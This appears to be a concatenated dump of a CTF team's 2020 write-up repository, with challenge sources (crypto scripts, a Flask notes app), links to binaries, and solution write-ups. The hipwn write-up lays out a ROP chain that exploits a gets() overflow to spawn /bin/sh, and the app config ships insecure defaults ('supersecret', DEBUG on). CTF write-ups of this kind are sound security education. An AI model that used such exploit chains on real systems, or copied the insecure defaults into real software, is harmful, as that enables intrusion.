* [Password Keeper (pwn)](password_keeper)
* [Navigation Journal (pwn)](navigation_journal)
* [Save The Plane (warmup)](save_the_plane)
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/drawing/README.md:
--------------------------------------------------------------------------------
# Drawings on the walls (forensics, 100p, 113 solved)

A classic guessy forensics challenge.
We get a ~2GB memdump of a Windows machine and we're supposed to find flags there.

You can try to use volatility but it's not really useful here.
It boils down to strings+grep skills.

Looking for `Aero{` in the memdump shows some fake flags, but when we switch to looking for unicode strings we hit the unicode string `A.e.r.o.{.g.0.0.d.j.0.b._.y`.
That's not a whole flag, but now we can look around for `g00d` and we find `g00dj0b_y..0u_f1n4..11y_g07_7h3_wh0l3_fl4g`

We can merge this and submit `Aero{g00dj0b_y0u_f1n411y_g07_7h3_wh0l3_fl4g}`

In the meantime we also found an interesting string `Here is AEORCTF keepass master key: FUCK_U_BEATCH_SUCK_KIRPITCH` but we were unable to locate the keepass db.
It was not in the memdump.
It turns out you had to guess that there is a pastebin link there...
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/elderly/file.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-01-AeroCTF/elderly/file.enc
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/elderly/main.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-01-AeroCTF/elderly/main.pyc
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/magic/output.txt:
--------------------------------------------------------------------------------
d9a103a6006bfba17074ef571011d8eededdf851b355bdc4795616744066433695b9e9201f6deff7577c03ba690d4d517bdaae
5405053190768240950975482839552589374748349681382030872360550121041249100085609471
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/magic/task.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python3.7

import numpy as np

from itertools import chain


class Cipher(object):
    def __init__(self, key: int, canary: int):
        self._key = key
        self._canary = canary
        return

    @property
    def canary(self) -> int:
        return self._canary

    def encrypt(self, message: bytes) -> bytes:
        plaintext = int.from_bytes(message, 'big')
        assert self._key.bit_length() >= plaintext.bit_length()
        ciphertext = self._key ^ plaintext
        length = (ciphertext.bit_length() + 7) // 8
        return ciphertext.to_bytes(length, 'big')

    def decrypt(self, message: bytes) -> bytes:
        raise NotImplementedError

    @classmethod
    def create(cls, source: np.ndarray) -> 'Cipher':
        assert len(set(source.shape)) == 1
        line = source.reshape(-1)
        assert len(line) == len(set(line) & set(range(len(line))))
        keys = set(map(sum, chain.from_iterable((*s, np.diag(s)) for s in [source, source.T])))
        assert len(keys) == 1
        key = int(keys.pop())
        return cls(key, key % len(line))


def main():
    from secret import SECRET, FLAG
    cipher = Cipher.create(SECRET)
    print(cipher.encrypt(FLAG).hex())
    print(cipher.canary)
    return


if __name__ == '__main__':
    main()
--------------------------------------------------------------------------------
/2020-03-01-AeroCTF/mental_beginning/Cheme.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-01-AeroCTF/mental_beginning/Cheme.png
--------------------------------------------------------------------------------
/2020-03-07-zer0ptsCTF/README.md:
--------------------------------------------------------------------------------
# zer0pts CTF 2020

Team: XeR, SIben, BitK, shalom

### Table of contents

* [Locked kitkat (forensics)](locked)
* [Dirty Laundry (crypto)](dirty-laundry)
* [Nibelung (crypto)](nibelung)
* [ROR (crypto)](ror)
* [vmlog (re)](vmlog)
* [QR Puzzle (re)](qr)
* [easy strcmp (re)](strcmp)
* [wysinwyg (re)](wysinwyg)
* [Hobbit (re)](hobbit)
* [hipwn (pwn)](hipwn)
* [diylist (pwn)](diylist)
* [protrude (pwn)](protrude)
* [babybof (pwn)](babybof)
* [syscall kit (pwn)](syscall)
* [meowmow (pwn)](meowmow)
--------------------------------------------------------------------------------
/2020-03-07-zer0ptsCTF/dirty-laundry/chall.py:
--------------------------------------------------------------------------------
#!/usr/bin/sage
from sage.all import *
from Crypto.Util.number import getStrongPrime, bytes_to_long

from secret import flag

class PRNG256(object):
    def __init__(self, seed):
        self.mask = (1 << 256) - 1
        self.seed = seed & self.mask

    def _pick(self):
        b = ((self.seed>>0)^(self.seed>>2)^(self.seed>>5)^(self.seed>>10)^1)&1
        self.seed = ((self.seed>>1)|(b<<255)) & self.mask
        return b

    def rand(self):
        x = 0
        for i in range(256):
            x = (x << 1) | self._pick()
        return x

PRIME = getStrongPrime(1024)
prng = PRNG256(PRIME)

def paillier_enc(m, p, noise):
    p = next_prime(p + noise)
    q = getStrongPrime(512)
    n = p * q
    g = (1 + prng.rand() * n) % n**2
    c = pow(g, m, n**2) * pow(prng.rand(), n, n**2) % n**2
    return n, g, c

def make_shares(secret, k, shares, prime=PRIME):
    PR, x = PolynomialRing(GF(prime), name='x').objgen()
    f = PR([secret] + [ZZ.random_element(prime) for _ in range(k-1)])
    xy = []
    pubkey = []
    for x in range(1, shares+1):
        noise = prng.rand()
        n, g, y = paillier_enc(f(x) + noise, prime, noise)
        pubkey.append([n, g])
        xy.append([x, y])
    return pubkey, xy

secret = bytes_to_long(flag)
pubkey, shares = make_shares(secret, 3, 5)

print("[+] len(flag):", len(flag))
print("[+] pubkey:", pubkey)
print("[+] shares:", shares)
--------------------------------------------------------------------------------
/2020-03-07-zer0ptsCTF/hipwn/README.md: -------------------------------------------------------------------------------- 1 | # hipwn - zer0pts CTF 2020 (pwn, 158p, 81 solved) 2 | ## Introduction 3 | 4 | hipwn is a pwn task. 5 | 6 | An archive containing a binary and its source code is provided. 7 | 8 | The binary asks the user for their name, and prints it. 9 | 10 | ## Exploitation 11 | 12 | The binary uses `gets` to read the user input in a fixed-size array on the 13 | stack. There is no protection on the stack. 14 | 15 | This is the most basic case of a stack-based buffer overflow. 16 | 17 | The binary is statically compiled, so the whole libc is contained in the binary. 18 | It is not compiled as a position-independent executable. As a result, it is not 19 | subject to ASLR. 20 | 21 | The ROP chain used to exploit this binary is the following: 22 | ```assembler 23 | pop rax; "/bin/sh\0" 24 | pop rdi; 0x00604268 // somewhere on the bss 25 | mov [rdi], rax 26 | pop rsi; NULL 27 | pop rdx; NULL 28 | pop rax; SYS_execve 29 | syscall 30 | ``` 31 | 32 | **Flag**: `zer0pts{welcome_yokoso_osooseyo_huanying_dobropozhalovat}` 33 | 34 | ## Appendices 35 | 36 | ### pwn.php 37 | 38 | ```php 39 | #!/usr/bin/php 40 | 321564 12 | 13 | [+] Gesture: 14 | 15 | ----- ----- ----- 16 | | | | 3 | | 2 | 17 | ----- ----- ----- 18 | ----- ----- ----- 19 | | 1 | | 6 | | 4 | 20 | ----- ----- ----- 21 | ----- ----- ----- 22 | | 5 | | | | | 23 | ----- ----- ----- 24 | ``` 25 | 26 | Once we input this we get: `zer0pts{n0th1ng_1s_m0r3_pr4ct1c4l_th4n_brut3_f0rc1ng}` 27 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/locked/gesture.key: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/locked/gesture.key --------------------------------------------------------------------------------
/2020-03-07-zer0ptsCTF/nibelung/server.py: -------------------------------------------------------------------------------- 1 | from fglg import FiniteGeneralLinearGroup 2 | from secret import flag 3 | import base64 4 | import math 5 | 6 | def menu(): 7 | print("====================") 8 | print("[1] Encrypt", flush=True) 9 | print("[2] Decrypt", flush=True) 10 | print("====================") 11 | try: 12 | print("> ", end="", flush=True) 13 | return int(input()) 14 | except: 15 | return 0 16 | 17 | def bytes2gl(b, n, p=None): 18 | assert len(b) <= n * n 19 | X = FiniteGeneralLinearGroup(n, p) 20 | padlen = n * n - len(b) 21 | b = bytes([padlen]) * padlen + b 22 | for i in range(n): 23 | for j in range(n): 24 | X.set_at((j, i), b[i*n + j]) 25 | return X 26 | 27 | def recv_message(n, p): 28 | print("Data: ", end="", flush=True) 29 | b = base64.b64decode(input()) 30 | return bytes2gl(b, n, p) 31 | 32 | def encrypt(U, X): 33 | return U * X * U**-1 34 | 35 | def decrypt(U, X): 36 | return U**-1 * X * U 37 | 38 | if __name__ == '__main__': 39 | # Create flag F 40 | n = math.ceil(math.sqrt(len(flag))) 41 | F = bytes2gl(flag, n) 42 | p = F.p 43 | 44 | # Generate private key 45 | U = FiniteGeneralLinearGroup(n, p) 46 | while U.determinant() == 0: 47 | U.set_random() 48 | 49 | eF = encrypt(U, F) 50 | assert decrypt(U, eF) == F 51 | print("Encrypted Flag:", flush=True) 52 | print(eF, flush=True) 53 | print("p = {}".format(F.p), flush=True) 54 | 55 | while True: 56 | choice = menu() 57 | if choice == 1: 58 | # Encrypt 59 | M = recv_message(U.n, U.p) 60 | C = encrypt(U, M) 61 | print("Encrypted:", flush=True) 62 | print(C, flush=True) 63 | elif choice == 2: 64 | # Decrypt 65 | C = recv_message(U.n, U.p) 66 | M = decrypt(U, C) 67 | print("Decrypted:", flush=True) 68 | print(M, flush=True) 69 | else: 70 | break 71 | 72 | print("Bye!", flush=True) 73 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/chall: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/qr/chall -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/decoded.txt: -------------------------------------------------------------------------------- 1 | 1111111001000101001111111 2 | 1000001011001001001000001 3 | 1011101001110011101011101 4 | 1011101001100010101011101 5 | 1011101011000111001011101 6 | 1000001001110111101000001 7 | 1111111010101010101111111 8 | 0000000000101101100000000 9 | 1010101000001110000010010 10 | 0011100010000110101001001 11 | 1001001100011110111010011 12 | 1110110110001111000101000 13 | 0101001011011100011101011 14 | 0101100101111010101001011 15 | 1001011011011000000100111 16 | 0101010010001110011110011 17 | 1001101001110010111111000 18 | 0000000011110000100011001 19 | 1111111001100101101010111 20 | 1000001001010001100010000 21 | 1011101011101000111111011 22 | 1011101000111101000010000 23 | 1011101010111011010110101 24 | 1000001001001111111010010 25 | 1111111011110011100011011 26 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/encrypted.qr: -------------------------------------------------------------------------------- 1 | 1111111100000100110011111 2 | 1010000011100011100101010 3 | 1010010111010110011010100 4 | 0011101001100100010111111 5 | 1011101001111011110101111 6 | 0010101111010111001010000 7 | 1101001010010011110000111 8 | 1001000100011101000011000 9 | 0000010010100110010011000 10 | 1111100000001010001100011 11 | 0011000111001101010010010 12 | 1011101010111011001101111 13 | 1100110001111100010100110 14 | 0100111111011000110100001 15 | 0010100100001111000011101 16 | 0001001010110000011111011 17 | 1101110001111000101111000 18 | 1100000011100011100011011 19 | 0101110001101101110110001 20 | 1100011011001000011010110 21 | 
1011001001110001011110001 22 | 1101011010110100100010100 23 | 0011101000011111010011010 24 | 1110011000100111111001110 25 | 1110110111111011110001001 26 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/qr/out.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/qr/out.png -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/ror/chall.py: -------------------------------------------------------------------------------- 1 | import random 2 | from secret import flag 3 | 4 | ror = lambda x, l, b: (x >> l) | ((x & ((1<": 28 | p = (p + 1) % 10 29 | elif op == "<": 30 | p = (p - 1) % 10 31 | elif op == ",": 32 | a = sys.stdin.buffer.read(1) 33 | if not a: 34 | reg = 0 35 | else: 36 | reg += ord(a) 37 | elif op == "p": 38 | buf += str(reg) 39 | elif op == "[": 40 | if reg == 0: 41 | cnt = 1 42 | while cnt != 0: 43 | pc += 1 44 | if program[pc] == "[": 45 | cnt += 1 46 | if program[pc] == "]": 47 | cnt -= 1 48 | elif op == "]": 49 | if reg != 0: 50 | cnt = 1 51 | while cnt != 0: 52 | pc -= 1 53 | if program[pc] == "[": 54 | cnt -= 1 55 | if program[pc] == "]": 56 | cnt += 1 57 | elif op == "M": 58 | print(mem) 59 | 60 | pc += 1 61 | 62 | print(buf) 63 | -------------------------------------------------------------------------------- /2020-03-07-zer0ptsCTF/wysinwyg/wysinwyg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-07-zer0ptsCTF/wysinwyg/wysinwyg -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/README.md: -------------------------------------------------------------------------------- 1 | # Volga CTF 2020 2 | 3 | Team: XeR, SIben, BitK, 
SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [DotNetMe (reverse)](dotnetme) 8 | -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/check_flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/check_flag.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/cleaned_with_de4dot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/cleaned_with_de4dot.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/cli.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/cli.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/computeHash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/computeHash.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/congratulation.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/congratulation.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/de4dot.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/de4dot.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/debugger_internal_error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/debugger_internal_error.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/extracted_key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/extracted_key.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/hash_check.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/hash_check.PNG -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/magic.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/magic.gif -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/no_invalid_format.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/no_invalid_format.png 
-------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/obfuscated.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/obfuscated.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/obfuscated2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/obfuscated2.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/task.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/task.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/unknown_string.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/unknown_string.png -------------------------------------------------------------------------------- /2020-03-29-VolgaCTF/dotnetme/vs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-03-29-VolgaCTF/dotnetme/vs.png -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/README.md: -------------------------------------------------------------------------------- 1 | # MidnightSun CTF 2020 Quals 2 | 3 | Team: XeR, SIben, BitK, SakiiR, shalom 4 | 5 | ### Table of contents 
6 | 7 | 8 | * [Masterpiece (forensics)](masterpiece) 9 | * [Verifier2 (crypto)](verifier2) 10 | -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/Mario Paint (Japan, USA).000: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-04-MidnightSun-quals/masterpiece/Mario Paint (Japan, USA).000 -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/README.md: -------------------------------------------------------------------------------- 1 | # Masterpiece (forensics, 78p, 115 solved) 2 | 3 | In the challenge we get a Snes9x [state save file](masterpiece.000). 4 | This is basically a saved state of the emulator. 5 | If we ungzip this file and look at it with a hex editor we can extract some information about the game: 6 | 7 | ``` 8 | NAM:000065:Z:\Share\snes-forensics\snes9x\Roms\Mario Paint (Japan, USA).sfc 9 | ``` 10 | 11 | So we know the game, and we can easily find this ROM on the internet. 12 | However, just trying to load this file via `load game position` crashes/hangs the emulator. 13 | 14 | If you look at the specs for the save state file, e.g. at https://github.com/snes9xgit/snes9x/blob/master/docs/snapshots.txt 15 | you will see that the file has a clear structure with sections we can easily find by looking for certain strings. 16 | 17 | Our first idea was to create a clean save state file for this game, and then transplant the memory and register values from the broken save file, using a hex editor.
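The block layout visible in the `NAM:000065:` line is enough to script the transplant described above instead of doing it by hand in a hex editor. This is an added example, not the team's tooling: it assumes every block uses the same `NAME:NNNNNN:` framing as the `NAM` line, and the `REG`/`RAM` block names, the preamble and all sample bytes are constructed for the illustration.

```python
import gzip
import re

# Framing seen in the NAM line quoted in the write-up: 3-character block name,
# ':', 6-digit decimal payload length, ':', then that many payload bytes.
# Assumption of this example: every block in the file is framed this way.
BLOCK_HEADER = re.compile(rb"([A-Z0-9]{3}):(\d{6}):")


def maybe_gunzip(data):
    """Save states are gzip-compressed on disk; pass raw data through unchanged."""
    return gzip.decompress(data) if data[:2] == b"\x1f\x8b" else data


def parse_snapshot(data):
    """Split a decompressed snapshot into (preamble, [(name, payload), ...])."""
    first = BLOCK_HEADER.search(data)
    if first is None:
        raise ValueError("no block header found")
    preamble, pos, blocks = data[:first.start()], first.start(), []
    while pos < len(data):
        m = BLOCK_HEADER.match(data, pos)
        if m is None:
            raise ValueError(f"expected a block header at offset {pos}")
        end = m.end() + int(m.group(2))
        if end > len(data):
            raise ValueError(f"block {m.group(1).decode()} runs past end of file")
        blocks.append((m.group(1).decode(), data[m.end():end]))
        pos = end  # skip the payload so binary data is never scanned for headers
    return preamble, blocks


def build_snapshot(preamble, blocks):
    """Serialise blocks again, recomputing every length field."""
    out = bytearray(preamble)
    for name, payload in blocks:
        if len(payload) > 999999:
            raise ValueError(f"{name}: payload does not fit a 6-digit length")
        out += f"{name}:{len(payload):06d}:".encode() + payload
    return bytes(out)


def transplant(clean, broken, names):
    """Return the clean snapshot with the named blocks taken from the broken one."""
    preamble, clean_blocks = parse_snapshot(maybe_gunzip(clean))
    donor = dict(parse_snapshot(maybe_gunzip(broken))[1])
    wanted = set(names)
    present = {name for name, _ in clean_blocks} & donor.keys()
    missing = wanted - present
    if missing:
        raise ValueError(f"blocks not present in both files: {sorted(missing)}")
    merged = []
    for name, payload in clean_blocks:
        if name in wanted:
            # Fixed-size state regions should match; a mismatch means the two
            # files do not describe the same machine layout.
            if len(donor[name]) != len(payload):
                raise ValueError(f"{name}: size differs between the two files")
            payload = donor[name]
        merged.append((name, payload))
    return build_snapshot(preamble, merged)


# Constructed sample data (not taken from the challenge files).
SAMPLE_PREAMBLE = b"#!s9xsnp:0011\n"
ROM_PATH = b"Z:\\Share\\snes-forensics\\snes9x\\Roms\\Mario Paint (Japan, USA).sfc\x00"
CLEAN = build_snapshot(
    SAMPLE_PREAMBLE, [("NAM", ROM_PATH), ("REG", bytes(4)), ("RAM", bytes(8))])
BROKEN = build_snapshot(
    SAMPLE_PREAMBLE,
    [("NAM", ROM_PATH), ("REG", b"\x12\x34\x56\x78"), ("RAM", b"flagdata")])

if __name__ == "__main__":
    fixed = transplant(CLEAN, gzip.compress(BROKEN), ["REG", "RAM"])
    for name, payload in parse_snapshot(fixed)[1]:
        print(name, len(payload), payload[:16])
```
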
18 | 19 | With this we got [this save file](Mario Paint (Japan, USA).000) which when loaded shows: 20 | 21 | ![](flag.png) 22 | 23 | And the flag is: `midnight{ITS_A_ME_FLAG_IN_THE_A_GAME}` 24 | -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-04-MidnightSun-quals/masterpiece/flag.png -------------------------------------------------------------------------------- /2020-04-04-MidnightSun-quals/masterpiece/masterpiece.000: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-04-MidnightSun-quals/masterpiece/masterpiece.000 -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/README.md: -------------------------------------------------------------------------------- 1 | # ByteBandits CTF 2020 2 | 3 | Team: XeR, SakiiR, shalom 4 | 5 | ### Table of contents 6 | 7 | * [Autobot (re)](autobot) 8 | * [Baby rust (re)](baby_rust) 9 | * [Oldschool (crypto)](oldschool) 10 | * [Secure DES (crypto)](secure_des) 11 | * [RSyay! 
(crypto)](rsyay) 12 | * [Meet me there (crypto)](meet) 13 | * [Extra careful bank (crypto)](ecb) 14 | * [AESy (crypto)](aesy) 15 | * [string.equals(integer) (misc)](string_equals) 16 | * [wooter (re)](wooter) 17 | * [Notes App (web)](notes-app) 18 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/baby_rust/babyrust: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-12-ByteBanditsCTF/baby_rust/babyrust -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/meet/meet.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import random 4 | from Crypto.Cipher import AES 5 | from os import urandom 6 | from string import printable 7 | 8 | random.seed(urandom(32)) 9 | 10 | key1 = '0'*13 + ''.join([random.choice(printable) for _ in range(3)]) 11 | key2 = ''.join([random.choice(printable) for _ in range(3)]) + '0'*13 12 | 13 | cipher1 = AES.new(key=key1, mode=AES.MODE_ECB) 14 | cipher2 = AES.new(key=key2, mode=AES.MODE_ECB) 15 | 16 | print "\nGive me a string:" 17 | pt = raw_input() 18 | 19 | val = len(pt) % 16 20 | if not val == 0: 21 | pt += '0'*(16 - val) 22 | 23 | c1 = cipher1.encrypt(pt.encode('hex')) 24 | c2 = cipher2.encrypt(c1.encode('hex')) 25 | print 'Encrypted string:\n' + c2.encode('hex') 26 | 27 | with open("flag.txt") as f: 28 | flag = f.read().strip() 29 | # length of flag is a multiple of 16 30 | ct1 = cipher1.encrypt(flag.encode('hex')) 31 | ct2 = cipher2.encrypt(ct1.encode('hex')) 32 | print '\nEncrypted Flag:\n' + ct2.encode('hex') + '\n' 33 | 34 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/images/main.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-12-ByteBanditsCTF/notes-app/images/main.png -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:alpine 2 | 3 | RUN apk add --no-cache postgresql-libs && \ 4 | apk add --no-cache --virtual .build-deps gcc musl-dev postgresql-dev chromium udev ttf-freefont 5 | 6 | COPY . /app 7 | 8 | WORKDIR /app 9 | 10 | RUN pip install -r requirements.txt 11 | 12 | RUN pip install pyppeteer 13 | 14 | # Create a group and user 15 | RUN addgroup -S appgroup && adduser -S appuser -G appgroup 16 | 17 | # Tell docker that all future commands should run as the appuser user 18 | USER appuser 19 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/config.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | 4 | class Config: 5 | """Set Flask configuration vars from .env file.""" 6 | 7 | # General Config 8 | SECRET_KEY = os.environ.get('SECRET_KEY', "supersecret") 9 | FLASK_APP = os.environ.get('FLASK_APP') 10 | FLASK_ENV = os.environ.get('FLASK_ENV') 11 | FLASK_DEBUG = os.environ.get('FLASK_DEBUG') 12 | 13 | DEBUG = os.environ.get('DEBUG', True) 14 | 15 | # Database 16 | SQLALCHEMY_DATABASE_URI = os.environ.get('SQLALCHEMY_DATABASE_URI', "sqlite:///test.db") 17 | SQLALCHEMY_TRACK_MODIFICATIONS = os.environ.get('SQLALCHEMY_TRACK_MODIFICATIONS') 18 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3" 2 | services: 3 | web: 4 | build: . 
5 | command: gunicorn server:app -b '0.0.0.0:8000' 6 | ports: 7 | - "7002:8000" 8 | volumes: 9 | - .:/app 10 | environment: 11 | - ADMIN_PASS 12 | - FLAG 13 | - SQLALCHEMY_DATABASE_URI=sqlite:////tmp/test.db 14 | depends_on: 15 | - redis 16 | worker: 17 | build: . 18 | command: rq worker -u 'redis://redis' 19 | depends_on: 20 | - redis 21 | environment: 22 | - ADMIN_PASS 23 | volumes: 24 | - .:/app 25 | redis: 26 | image: redis:alpine 27 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/__init__.py: -------------------------------------------------------------------------------- 1 | """Initialize app.""" 2 | from flask import Flask 3 | from flask_sqlalchemy import SQLAlchemy 4 | from flask_login import LoginManager 5 | 6 | db = SQLAlchemy() 7 | login_manager = LoginManager() 8 | 9 | 10 | def create_app(): 11 | """Construct the core app object.""" 12 | app = Flask(__name__, instance_relative_config=False) 13 | 14 | # Application Configuration 15 | app.config.from_object('config.Config') 16 | 17 | # Initialize Plugins 18 | db.init_app(app) 19 | login_manager.init_app(app) 20 | 21 | with app.app_context(): 22 | 23 | # Create Database Models 24 | db.create_all() 25 | 26 | return app 27 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/models.py: -------------------------------------------------------------------------------- 1 | from . 
import db 2 | from flask_login import UserMixin 3 | from werkzeug.security import generate_password_hash, check_password_hash 4 | 5 | 6 | class User(UserMixin, db.Model): 7 | """Model for user accounts.""" 8 | 9 | __tablename__ = 'flasklogin-users' 10 | 11 | id = db.Column(db.String(50), 12 | primary_key=True) 13 | password = db.Column(db.String(200), 14 | primary_key=False, 15 | unique=False, 16 | nullable=False) 17 | notes = db.Column(db.String(200), 18 | primary_key=False, 19 | unique=False, 20 | nullable=False) 21 | 22 | def set_password(self, password): 23 | """Create hashed password.""" 24 | self.password = generate_password_hash(password, method='sha256') 25 | 26 | def check_password(self, password): 27 | """Check hashed password.""" 28 | return check_password_hash(self.password, password) 29 | 30 | def __repr__(self): 31 | return ''.format(self.id) 32 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 | 4 |
5 |
6 | 30 |
31 |
32 |
33 |

34 | My Notes 35 |

36 |

37 | A secure place to jot down your thoughts 38 |

Start writing now

39 | 40 |
41 |
42 |
43 | 44 | {% endblock %} 45 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/layout.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | NotesApp 8 | 14 | 15 | 16 | {% block body %} {% endblock %} 17 | 18 |
19 |
20 |

MyNotes by n0ob.

21 |
22 |
23 | 24 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/templates/login.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block body %} 3 |
4 |
5 |
